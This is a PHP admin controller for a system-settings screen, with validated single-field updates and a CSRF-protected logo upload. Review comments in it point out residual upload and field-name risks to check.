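<?php

/**
 * Admin controller for the system-wide settings ("Datos") screen.
 *
 * index() renders the form; updateField() and uploadLogo() are JSON
 * endpoints that mutate state and are therefore POST-only and CSRF-checked.
 *
 * Depends on BaseController (generateCsrf, validateCsrf, renderJson,
 * renderView), SystemData and BASE_URL, all defined elsewhere in the
 * project. NOTE(review): the code below no longer assumes renderJson()
 * terminates the request — every early error response is followed by a
 * return, so nothing falls through into the mutation if it merely echoes.
 *
 * Failures that are meant to be shown to the user are raised as
 * DomainException. It is deliberately not a RuntimeException subclass, so
 * driver errors such as PDOException (which *is* one) can never be mirrored
 * back to the client by the catch blocks; those are logged instead.
 */
class DatosController extends BaseController
{
    /** Upper bound for an uploaded logo, in bytes (message below says 2MB). */
    private const LOGO_MAX_BYTES = 2 * 1024 * 1024;

    /** Extensions accepted on the client-supplied file name (coarse first filter only). */
    private const LOGO_EXTENSIONS = ['png', 'jpg', 'jpeg', 'webp', 'gif'];

    /**
     * Image types accepted for the logo, keyed by the IMAGETYPE_* value that
     * getimagesize() reports, mapped to the extension the file is stored with.
     * The stored extension is derived from the decoded content, never from the
     * client's file name, so a content/extension mismatch cannot be smuggled in.
     */
    private const LOGO_TYPES = [
        IMAGETYPE_PNG  => 'png',
        IMAGETYPE_JPEG => 'jpg',
        IMAGETYPE_WEBP => 'webp',
        IMAGETYPE_GIF  => 'gif',
    ];

    /**
     * Trims a scalar request value to a string; null and whitespace-only
     * input both collapse to null so "unset" and "blank" are stored alike.
     *
     * @param mixed $value raw request value
     * @throws DomainException when the value is an array (e.g. `value[]=x`),
     *                         which would otherwise be stored as "Array"
     */
    private function normalizeText($value): ?string
    {
        if ($value === null) {
            return null;
        }
        if (is_array($value)) {
            throw new DomainException('Valor inválido.');
        }
        $text = trim((string)$value);

        return $text === '' ? null : $text;
    }

    /**
     * Parses a non-negative integer setting; blank input yields $default.
     *
     * @param mixed $value raw request value
     * @throws DomainException when the value is not numeric
     */
    private function parseNonNegativeInt($value, int $default): int
    {
        $text = $this->normalizeText($value);
        if ($text === null) {
            return $default;
        }
        if (!is_numeric($text)) {
            throw new DomainException('Valor inválido.');
        }

        return max(0, (int)$text);
    }

    /**
     * Parses a non-negative amount setting; blank input yields 0.
     *
     * @param mixed $value raw request value
     * @return int|float int 0 at the floor (max() keeps its first operand on a
     *                   tie), otherwise the parsed float — preserved as-is because
     *                   the JSON response and SystemData both see this value
     * @throws DomainException when the value is not numeric
     */
    private function parseNonNegativeFloat($value)
    {
        $text = $this->normalizeText($value);
        if ($text === null) {
            return 0;
        }
        if (!is_numeric($text)) {
            throw new DomainException('Valor inválido.');
        }

        return max(0, (float)$text);
    }

    /**
     * Validates and coerces a single setting value according to the field.
     * Fields without dedicated rules are stored as trimmed free text.
     *
     * @param mixed $value raw request value
     * @return mixed int, float, string or null — whatever SystemData stores
     * @throws DomainException on a value the field cannot accept
     */
    private function sanitizeFieldValue(string $field, $value)
    {
        switch ($field) {
            case 'invoice_due_days':
                return $this->parseNonNegativeInt($value, 10);

            case 'cut_alert_days':
                return $this->parseNonNegativeInt($value, 0);

            case 'late_fee_method':
                $method = strtolower($this->normalizeText($value) ?? 'days');
                if (!in_array($method, ['days', 'percentage'], true)) {
                    throw new DomainException('Método de mora inválido.');
                }
                return $method;

            case 'late_fee_percentage':
                $percentage = $this->parseNonNegativeFloat($value);
                // Keep the percentage in a sensible range.
                if ($percentage > 100) {
                    $percentage = 100;
                }
                return $percentage;

            case 'late_fee_daily_amount':
                return $this->parseNonNegativeFloat($value);

            case 'email':
                $email = $this->normalizeText($value);
                if ($email !== null && !filter_var($email, FILTER_VALIDATE_EMAIL)) {
                    throw new DomainException('Correo electrónico inválido.');
                }
                return $email;

            case 'constitution_date':
                $date = $this->normalizeText($value);
                if ($date !== null) {
                    $parsed = DateTimeImmutable::createFromFormat('Y-m-d', $date);
                    // Round-trip comparison rejects overflowing dates such as
                    // 2024-02-30, which createFromFormat silently normalises.
                    if (!$parsed || $parsed->format('Y-m-d') !== $date) {
                        throw new DomainException('Fecha inválida.');
                    }
                }
                return $date;

            case 'aqueduct_type':
            default:
                return $this->normalizeText($value);
        }
    }

    /**
     * Shared prelude for the mutating JSON endpoints: rejects anything but
     * POST and anything without a valid CSRF token.
     *
     * @return bool true when the request may proceed; false after an error
     *              response has already been rendered
     */
    private function guardMutation(): bool
    {
        if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
            $this->renderJson(['ok' => false, 'error' => 'Método inválido.'], 405);
            return false;
        }
        if (!$this->validateCsrf()) {
            $this->renderJson(['ok' => false, 'error' => 'CSRF inválido.'], 400);
            return false;
        }

        return true;
    }

    /**
     * Validates an uploaded logo and moves it into public/uploads/system.
     *
     * The stored name is generated server-side (timestamp + random suffix) and
     * its extension comes from the image type getimagesize() decoded, so the
     * client's file name never influences the final path.
     *
     * NOTE(review): getimagesize() only proves the file *starts* like an
     * image; a GIF/JPEG polyglot carrying PHP still passes. This is only safe
     * because the file is stored with an image extension — confirm the web
     * server additionally has script execution disabled under public/uploads
     * (e.g. engine off / no .htaccess override).
     *
     * @param array $file one $_FILES entry
     * @return string path relative to public/, as stored in SystemData
     * @throws DomainException on any validation or storage failure
     */
    private function handleLogoUpload(array $file): string
    {
        if (empty($file['tmp_name']) || (int)($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
            throw new DomainException('No se recibió una imagen válida.');
        }
        if (!empty($file['size']) && (int)$file['size'] > self::LOGO_MAX_BYTES) {
            throw new DomainException('La imagen excede el tamaño máximo permitido (2MB).');
        }

        $claimedExtension = strtolower(pathinfo((string)($file['name'] ?? ''), PATHINFO_EXTENSION));
        if (!in_array($claimedExtension, self::LOGO_EXTENSIONS, true)) {
            throw new DomainException('Formato de imagen no permitido.');
        }

        $tmp = (string)$file['tmp_name'];
        // Refuse to even inspect a path that PHP did not create for this request.
        if (!is_uploaded_file($tmp)) {
            throw new DomainException('No se recibió una imagen válida.');
        }

        // getimagesize() warns rather than throws on non-image input; the
        // return value is checked, so the warning is suppressed deliberately.
        $info = @getimagesize($tmp);
        if ($info === false) {
            throw new DomainException('El archivo no parece ser una imagen.');
        }
        if (!isset(self::LOGO_TYPES[$info[2]])) {
            throw new DomainException('Formato de imagen no permitido.');
        }
        $extension = self::LOGO_TYPES[$info[2]];

        $targetDir = dirname(__DIR__) . '/public/uploads/system';
        // Second is_dir() covers a concurrent request creating it first.
        if (!is_dir($targetDir) && !mkdir($targetDir, 0775, true) && !is_dir($targetDir)) {
            throw new DomainException('No se pudo guardar el logo.');
        }

        $filename = 'logo_' . date('Ymd_His') . '_' . bin2hex(random_bytes(4)) . '.' . $extension;
        $destination = $targetDir . '/' . $filename;
        if (!move_uploaded_file($tmp, $destination)) {
            throw new DomainException('No se pudo guardar el logo.');
        }
        // Best effort: upload temp files are typically 0600; make the logo
        // world-readable for the web server and ensure no execute bit.
        @chmod($destination, 0644);

        return 'uploads/system/' . $filename;
    }

    /** Renders the settings form with a fresh CSRF token and current values. */
    public function index(): void
    {
        $this->renderView('datos/index', [
            'csrf' => $this->generateCsrf(),
            'data' => SystemData::get(),
        ]);
    }

    /**
     * JSON endpoint: stores a single setting from POST `field` / `value`.
     *
     * Responds 405 for non-POST, 400 for CSRF/validation errors and 500 for
     * unexpected failures (logged server-side, message not echoed).
     */
    public function updateField(): void
    {
        if (!$this->guardMutation()) {
            return;
        }

        $field = $_POST['field'] ?? '';
        $field = is_string($field) ? trim($field) : '';
        // NOTE(review): $field reaches SystemData::updateField() as supplied by
        // the client. If that method derives a column or key name from it, it
        // must allowlist; the syntactic check here only excludes strings that
        // could never be a setting name. Also confirm whether 'logo_path'
        // (normally written only by uploadLogo()) should be settable here.
        if (!preg_match('/^[A-Za-z][A-Za-z0-9_]{0,63}$/', $field)) {
            $this->renderJson(['ok' => false, 'error' => 'Campo inválido.'], 400);
            return;
        }

        try {
            $value = $this->sanitizeFieldValue($field, $_POST['value'] ?? null);
            if (!SystemData::updateField($field, $value)) {
                throw new DomainException('No se pudo guardar el campo.');
            }
            $this->renderJson([
                'ok' => true,
                'field' => $field,
                'value' => $value,
            ]);
        } catch (DomainException $e) {
            // Validation failures carry a message written for the user.
            $this->renderJson(['ok' => false, 'error' => $e->getMessage()], 400);
        } catch (Throwable $e) {
            // Driver/runtime errors may contain SQL, paths or stack details:
            // keep them in the log, not in the response.
            error_log(sprintf('DatosController::updateField(%s): %s', $field, $e));
            $this->renderJson(['ok' => false, 'error' => 'No se pudo guardar el campo.'], 500);
        }
    }

    /**
     * JSON endpoint: stores the uploaded `logo` file and records its path.
     *
     * If the path cannot be persisted the just-written file is removed so
     * failed attempts do not accumulate in public/uploads/system.
     */
    public function uploadLogo(): void
    {
        if (!$this->guardMutation()) {
            return;
        }

        try {
            $file = $_FILES['logo'] ?? null;
            if (!is_array($file) || empty($file['tmp_name'])) {
                throw new DomainException('Debes seleccionar una imagen.');
            }

            $path = $this->handleLogoUpload($file);
            if (!SystemData::updateField('logo_path', $path)) {
                @unlink(dirname(__DIR__) . '/public/' . $path);
                throw new DomainException('No se pudo guardar el logo.');
            }

            $this->renderJson([
                'ok' => true,
                'logo_path' => $path,
                'url' => BASE_URL . $path,
            ]);
        } catch (DomainException $e) {
            $this->renderJson(['ok' => false, 'error' => $e->getMessage()], 400);
        } catch (Throwable $e) {
            error_log('DatosController::uploadLogo: ' . $e);
            $this->renderJson(['ok' => false, 'error' => 'No se pudo guardar el logo.'], 500);
        }
    }
}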